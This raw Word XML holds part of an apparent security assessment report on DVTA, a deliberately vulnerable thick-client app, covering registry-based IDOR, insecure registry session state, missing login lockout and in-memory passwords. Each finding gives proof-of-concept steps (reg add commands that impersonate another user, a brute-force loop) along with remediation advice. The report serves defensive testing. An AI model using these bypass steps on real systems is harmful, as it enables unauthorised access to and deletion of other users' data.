    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000172">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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 140: viewExpenses builds query with raw emailid via concatenation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000173">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74">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4" name=""/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:cNvPr id="5" name="Shape 5"/>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75">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7 — Main.cs: emailid read from registry used directly in expense queries</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000176">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77">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78">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Main.cs reads the email value from HKCU\dvta at runtime and passes it directly to viewExpenses() and clearExpenses() without any server-side ownership verification. Because the registry is writable by any user-space process, an attacker can modify the email value to any target email address.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table26"/>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179">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Main.cs  Line 103–104  (btnView_Click)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017A">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string emailid = (string)registryKey.GetValue("email", "null");  // TRUSTED?</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017B">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this.returnvalue = dbaccessClass.viewExpenses(emailid);  // no ownership check</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017C">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7D">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DBAccessClass.cs Line 140 — no WHERE clause ownership check:</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017E">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"select ... from expenses where email='" + emailid + "'"  // IDOR</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017F">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80">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Proof of Concept</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000181">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While logged in as rebecca, execute in cmd.exe:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000182">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reg add HKCU\dvta /v email /t REG_SZ /d "admin@dvta.local" /f</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000183">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Click "View Expenses" in DVTA — admin@dvta.local expenses are returned.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000184">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To delete target user expenses:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000185">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reg add HKCU\dvta /v email /t REG_SZ /d "admin@dvta.local" /f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000186">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[Click "Clear Expenses" in DVTA]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000187">
      <w:pPr>
        <w:spacing w:after="140" w:before="2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2"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Live Evidence — Figure 7a (F8: IDOR via Registry Tampering)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000188">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840605" cy="3533775"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="5" name=""/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:cNvPr id="6" name="Shape 6"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2932048" y="2019463"/>
                          <a:ext cx="4827905" cy="352107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840605" cy="3533775"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>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4840605" cy="353377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89">
      <w:pPr>
        <w:spacing w:after="20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7a — Screenshot (F8-PoC): reg add HKCU\dvta /v email changing registry value to admin@dvta.com. Both View Profile dialogs show before/after email values, confirming any logged-in user can access other users' expenses by writing their email to the registry.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018A">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27"/>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18B">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The application trusts registry values as authoritative user identity for data access. The registry is not a trust boundary — any process running as the same Windows user can modify it. This creates a trivial IDOR: one command modifies the identity used for all expense queries, enabling cross-user read and delete.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018C">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18D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>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Never use client-side storage (registry, local files, environment variables) as authoritative identity for server-side queries</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>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Enforce ownership server-side: WHERE email = @authenticatedEmail, where @authenticatedEmail comes from a server-validated session token</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018F">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90">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191">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28"/>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9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9  —  Insecure Session Management — Plaintext Windows Registry</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94">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CWE-384</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95">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7.3  —  High</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000196">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97">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98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Login.cs Lines 83–87: username, password, email, isLoggedIn written to HKCU\dvta</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000199">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Main.cs Lines 8–14: session state read from registry on every form load</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Main.cs Lines 44–51: logout writes "null" values — no session invalidation on server</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019B">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9C">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9D">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application implements session management entirely through Windows Registry keys. After login, four values are written to HKCU\dvta: username, password, email, and isLoggedIn. On every form load, Main.cs reads these values to determine authentication state. There is no server-side session, no token expiry, and no integrity protection.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table29"/>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19E">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Login.cs  Line 83–87</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019F">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registryKey.SetValue("username",   @string);</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A0">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registryKey.SetValue("password",   string2);  // PLAINTEXT</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A1">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registryKey.SetValue("email",      string3);  // used for IDOR (Finding 8)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A2">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registryKey.SetValue("isLoggedIn", "true");</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A3">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A4">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Main.cs  Line 10–14: auth check</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A5">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text = registryKey.GetValue("username", "null");</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A6">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string a    = registryKey.GetValue("isLoggedIn", "null");</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A7">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if (text == "null" || a == "false") { // show login } else { // allow</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A8">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0"/>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1A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Any local process can write isLoggedIn=true and a valid username to HKCU\dvta and gain an authenticated session without knowing any password. The session has no expiry, no integrity check, and no server-side component. This is also the root cause of the IDOR in Finding 8 — the registry is the trust anchor for all data access.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AA">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1AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Replace registry-based session with a server-side session token (signed JWT or opaque token)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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token must be issued by the server at login and verified by the server on every request</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Implement session expiry and invalidation on logout</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AE">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AF">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1B0">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1"/>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B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10  —  No Brute Force or Account Lockout Protection</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B3">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CWE-307</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B4">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5.3  —  Medium</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B5">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B6">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B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Login.cs Line 54: btnLogin_Click() — no attempt counter, no delay, no lockout logic</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Login.cs: IsBeingDebugged() </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:cs="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:color w:val="1a1a2e"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1a1a2e"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Environment.Exit(1) — anti-debugging present but no rate limiting</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B9">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BA">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1" name=""/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:cNvPr id="2" name="Shape 2"/>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BB">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9 — Login.cs: anti-debugging present but no rate limiting or account lockout</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BC">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BD">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BE">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login handler contains no failed-attempt counter, no time delay between attempts, and no account lockout mechanism. The application invests effort in anti-debugging (Debugger.IsAttached check) but omits the more impactful control of limiting credential guessing. Combined with CWE-89, brute force is rendered unnecessary — but the absence of lockout independently constitutes a vulnerability.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BF">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Proof of Concept</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C0">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Submit arbitrary username/password pairs at maximum network speed — no throttling, no blocking, no CAPTCHA.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C1">
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="22c55e"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>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for i in range(10000):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C2">
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="1e2835" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="22c55e"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:fill="1e2835" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    attempt_login("admin", wordlist[i])  # no delay enforced</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C3">
      <w:pPr>
        <w:spacing w:after="140" w:before="2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2"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Live Evidence — Figure 10a (F9: Session Bypass via Registry)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C4">
      <w:pPr>
        <w:spacing w:after="60" w:before="8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840605" cy="4491355"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="7" name=""/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:cNvPr id="8" name="Shape 8"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2932048" y="1540673"/>
                          <a:ext cx="4827905" cy="447865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840605" cy="4491355"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>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4840605" cy="449135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C5">
      <w:pPr>
        <w:spacing w:after="200" w:before="6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555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 10a — Screenshot (F9-PoC): reg add commands writing username, email, isLoggedIn=true directly to HKCU\dvta, opening DVTA Main panel without going through login. View Profile confirms tampered session (test@dvta.local) — session state is fully controllable externally.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C6">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2"/>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1C7">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Without lockout, an attacker can enumerate the full users table via SQLi in a single request, making brute force redundant. However, CWE-307 is independently exploitable against any account where SQLi is prevented by WAF or similar control.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C8">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1C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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Implement account lockout after 5 failed attempts with exponential backoff</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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Add CAPTCHA or challenge-response for repeated failures from the same source</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CB">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CC">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1CD">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3"/>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CE">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11  —  Decrypted Password Retained in Process Memory</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D0">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CWE-316</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D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6.5  —  Medium</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D2">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D3">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D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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 182: private string decryptedDBPassword — instance field</w:t>
      </w:r>
